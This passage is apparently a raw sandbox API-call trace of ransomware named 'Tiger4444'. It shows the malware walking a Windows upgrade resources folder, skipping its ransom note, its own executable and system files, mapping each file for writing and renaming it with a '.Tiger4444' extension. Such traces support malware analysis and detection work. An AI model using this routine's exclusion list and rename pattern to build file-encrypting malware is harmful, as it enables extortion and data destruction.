hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.692] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0041.692] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13314546750) returned 1 [0041.692] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0041.692] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0041.692] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.693] CloseHandle (hObject=0x2c8) returned 1 [0041.693] CloseHandle (hObject=0x260) returned 1 [0041.694] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css.Tiger4444") returned 59 [0041.694] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.css.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.css.tiger4444"), dwFlags=0x1) returned 1 [0041.694] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=5232 | out: Addend=0xc6f980) returned 4186960 [0041.694] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=14 | out: Addend=0xc6f98c) returned 2453 [0041.695] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3c2685, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3c2685, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7f589b00, ftLastWriteTime.dwHighDateTime=0x1d2ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x100ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="default_oobe.htm", cAlternateFileName="DEFAUL~2.HTM")) returned 1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="Tiger4444.exe") returned -1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2=".") returned 1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="..") returned 1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="windows") returned -1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="bootmgr") returned 1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="pagefile.sys") returned -1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="boot") returned 1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="ids.txt") returned -1 [0041.695] lstrcmpiW (lpString1="default_oobe.htm", lpString2="NTUSER.DAT") returned -1 [0041.695] lstrcpyW (in: lpString1=0x30aeaea, lpString2="default_oobe.htm" | out: lpString1="default_oobe.htm") returned="default_oobe.htm" [0041.695] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm", dwFileAttributes=0x0) returned 1 [0041.695] lstrlenW (lpString="default_oobe.htm") returned 16 [0041.695] lstrlenW (lpString="Tiger4444") returned 9 [0041.695] lstrcmpiW (lpString1="_oobe.htm", lpString2="Tiger4444") returned -1 [0041.695] lstrlenW (lpString=".dll") returned 4 [0041.695] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0041.695] lstrlenW (lpString=".lnk") returned 4 [0041.695] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0041.695] lstrlenW (lpString=".ini") returned 4 [0041.695] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0041.695] lstrlenW (lpString=".sys") returned 4 [0041.695] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0041.695] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.696] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.696] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13314869878) returned 1 [0041.696] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=65710) returned 1 [0041.696] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0041.696] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0041.696] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x103b0, lpName=0x0) returned 0x2c8 [0041.697] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x103b0) returned 0xbe0000 [0041.713] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.713] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0041.713] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.713] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0041.714] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.714] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0041.714] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.714] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0041.714] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13316695920) returned 1 [0041.714] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0041.714] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0041.714] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.715] CloseHandle (hObject=0x2c8) returned 1 [0041.715] CloseHandle (hObject=0x260) returned 1 [0041.717] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm.Tiger4444") returned 59 [0041.717] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\default_oobe.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\default_oobe.htm.tiger4444"), dwFlags=0x1) returned 1 [0041.718] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=65712 | out: Addend=0xc6f980) returned 4192192 [0041.718] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=18 | out: Addend=0xc6f98c) returned 2467 [0041.718] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea3c4d9e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea5f6eb5, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA", cAlternateFileName="")) returned 1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="Tiger4444.exe") returned -1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2=".") returned 1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="..") returned 1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="windows") returned -1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="bootmgr") returned 1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="pagefile.sys") returned -1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="boot") returned 1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="ids.txt") returned -1 [0041.718] lstrcmpiW (lpString1="EULA", lpString2="NTUSER.DAT") returned -1 [0041.718] lstrcpyW (in: lpString1=0x30aeaea, lpString2="EULA" | out: lpString1="EULA") returned="EULA" [0041.718] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665a0 [0041.718] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4c) returned 0xc5e610 [0041.718] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665a8 | out: ListHead=0xc66828, ListEntry=0xc665a8) returned 0xc66548 [0041.718] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x626300, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x52, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eula.css", cAlternateFileName="")) returned 1 [0041.718] lstrcmpiW (lpString1="eula.css", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.718] lstrcmpiW (lpString1="eula.css", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.718] lstrcmpiW (lpString1="eula.css", lpString2="Tiger4444.exe") returned -1 [0041.718] lstrcmpiW (lpString1="eula.css", lpString2=".") returned 1 [0041.718] lstrcmpiW (lpString1="eula.css", lpString2="..") returned 1 [0041.718] lstrcmpiW (lpString1="eula.css", lpString2="windows") returned -1 [0041.718] lstrcmpiW (lpString1="eula.css", lpString2="bootmgr") returned 1 [0041.719] lstrcmpiW (lpString1="eula.css", lpString2="pagefile.sys") returned -1 [0041.719] lstrcmpiW (lpString1="eula.css", lpString2="boot") returned 1 [0041.719] lstrcmpiW (lpString1="eula.css", lpString2="ids.txt") returned -1 [0041.719] lstrcmpiW (lpString1="eula.css", lpString2="NTUSER.DAT") returned -1 [0041.719] lstrcpyW (in: lpString1=0x30aeaea, lpString2="eula.css" | out: lpString1="eula.css") returned="eula.css" [0041.719] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\eula.css", dwFileAttributes=0x0) returned 1 [0041.728] lstrlenW (lpString="eula.css") returned 8 [0041.728] lstrlenW (lpString="Tiger4444") returned 9 [0041.728] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0041.728] lstrlenW (lpString=".dll") returned 4 [0041.728] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0041.729] lstrlenW (lpString=".lnk") returned 4 [0041.729] lstrcmpiW (lpString1=".css", lpString2=".lnk") returned -1 [0041.729] lstrlenW (lpString=".ini") returned 4 [0041.729] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0041.729] lstrlenW (lpString=".sys") returned 4 [0041.729] lstrcmpiW (lpString1=".css", lpString2=".sys") returned -1 [0041.729] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\eula.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.729] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.729] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13318195384) returned 1 [0041.729] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=82) returned 1 [0041.729] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0041.729] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc716a8 [0041.729] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x360, lpName=0x0) returned 0x2c8 [0041.731] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x360) returned 0xbe0000 [0041.732] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.732] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0041.732] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.732] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0041.732] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.732] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0041.732] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.732] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0041.732] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13318543785) returned 1 [0041.732] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0041.732] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc716a8 | out: hHeap=0xc50000) returned 1 [0041.732] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.733] CloseHandle (hObject=0x2c8) returned 1 [0041.733] CloseHandle (hObject=0x260) returned 1 [0041.734] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\eula.css.Tiger4444") returned 51 [0041.734] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\eula.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\eula.css.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula.css.tiger4444"), dwFlags=0x1) returned 1 [0041.734] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=96 | out: Addend=0xc6f980) returned 4257904 [0041.734] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 2485 [0041.734] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5f6eb5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5f6eb5, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xef0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetStarted.png", cAlternateFileName="GETSTA~1.PNG")) returned 1 [0041.734] lstrcmpiW (lpString1="GetStarted.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.734] lstrcmpiW (lpString1="GetStarted.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.734] lstrcmpiW (lpString1="GetStarted.png", lpString2="Tiger4444.exe") returned -1 [0041.734] lstrcmpiW (lpString1="GetStarted.png", lpString2=".") returned 1 [0041.734] lstrcmpiW (lpString1="GetStarted.png", lpString2="..") returned 1 [0041.734] lstrcmpiW (lpString1="GetStarted.png", lpString2="windows") returned -1 [0041.734] lstrcmpiW (lpString1="GetStarted.png", lpString2="bootmgr") returned 1 [0041.735] lstrcmpiW (lpString1="GetStarted.png", lpString2="pagefile.sys") returned -1 [0041.735] lstrcmpiW (lpString1="GetStarted.png", lpString2="boot") returned 1 [0041.735] lstrcmpiW (lpString1="GetStarted.png", lpString2="ids.txt") returned -1 [0041.735] lstrcmpiW (lpString1="GetStarted.png", lpString2="NTUSER.DAT") returned -1 [0041.735] lstrcpyW (in: lpString1=0x30aeaea, lpString2="GetStarted.png" | out: lpString1="GetStarted.png") returned="GetStarted.png" [0041.735] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png", dwFileAttributes=0x0) returned 1 [0041.735] lstrlenW (lpString="GetStarted.png") returned 14 [0041.735] lstrlenW (lpString="Tiger4444") returned 9 [0041.735] lstrcmpiW (lpString1="arted.png", lpString2="Tiger4444") returned -1 [0041.735] lstrlenW (lpString=".dll") returned 4 [0041.735] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.735] lstrlenW (lpString=".lnk") returned 4 [0041.735] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.735] lstrlenW (lpString=".ini") returned 4 [0041.735] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.735] lstrlenW (lpString=".sys") returned 4 [0041.736] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.736] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.736] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.736] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13318879630) returned 1 [0041.736] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=3824) returned 1 [0041.736] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0041.736] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0041.736] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11f0, lpName=0x0) returned 0x2c8 [0041.737] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11f0) returned 0xbe0000 [0041.738] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.738] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0041.738] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.738] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0041.738] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.738] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0041.738] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.738] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0041.738] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13319158073) returned 1 [0041.739] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0041.739] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0041.739] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.739] CloseHandle (hObject=0x2c8) returned 1 [0041.739] CloseHandle (hObject=0x260) returned 1 [0041.740] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png.Tiger4444") returned 57 [0041.740] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStarted.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstarted.png.tiger4444"), dwFlags=0x1) returned 1 [0041.740] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=3824 | out: Addend=0xc6f980) returned 4258000 [0041.740] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 2488 [0041.741] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea600acc, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea600acc, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xfe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GetStartedHoverOver.png", cAlternateFileName="GETSTA~2.PNG")) returned 1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="Tiger4444.exe") returned -1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2=".") returned 1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="..") returned 1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="windows") returned -1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="bootmgr") returned 1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="pagefile.sys") returned -1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="boot") returned 1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="ids.txt") returned -1 [0041.741] lstrcmpiW (lpString1="GetStartedHoverOver.png", lpString2="NTUSER.DAT") returned -1 [0041.741] lstrcpyW (in: lpString1=0x30aeaea, lpString2="GetStartedHoverOver.png" | out: lpString1="GetStartedHoverOver.png") returned="GetStartedHoverOver.png" [0041.741] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png", dwFileAttributes=0x0) returned 1 [0041.741] lstrlenW (lpString="GetStartedHoverOver.png") returned 23 [0041.741] lstrlenW (lpString="Tiger4444") returned 9 [0041.741] lstrcmpiW (lpString1="rOver.png", lpString2="Tiger4444") returned -1 [0041.741] lstrlenW (lpString=".dll") returned 4 [0041.741] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.741] lstrlenW (lpString=".lnk") returned 4 [0041.741] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.741] lstrlenW (lpString=".ini") returned 4 [0041.741] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.741] lstrlenW (lpString=".sys") returned 4 [0041.741] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.741] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.742] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.742] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13319469094) returned 1 [0041.742] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=4067) returned 1 [0041.742] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0041.742] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0041.742] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12f0, lpName=0x0) returned 0x2c8 [0041.743] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12f0) returned 0xbe0000 [0041.744] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.744] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0041.744] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.744] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0041.744] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.744] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0041.744] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.744] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0041.744] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13319725348) returned 1 [0041.744] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0041.744] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0041.744] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.744] CloseHandle (hObject=0x2c8) returned 1 [0041.744] CloseHandle (hObject=0x260) returned 1 [0041.746] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png.Tiger4444") returned 66 [0041.746] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\GetStartedHoverOver.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\getstartedhoverover.png.tiger4444"), dwFlags=0x1) returned 1 [0041.746] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=4080 | out: Addend=0xc6f980) returned 4261824 [0041.746] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 2490 [0041.746] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea600acc, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea600acc, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x43f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="loading.gif", cAlternateFileName="")) returned 1 [0041.746] lstrcmpiW (lpString1="loading.gif", lpString2="HOW TO 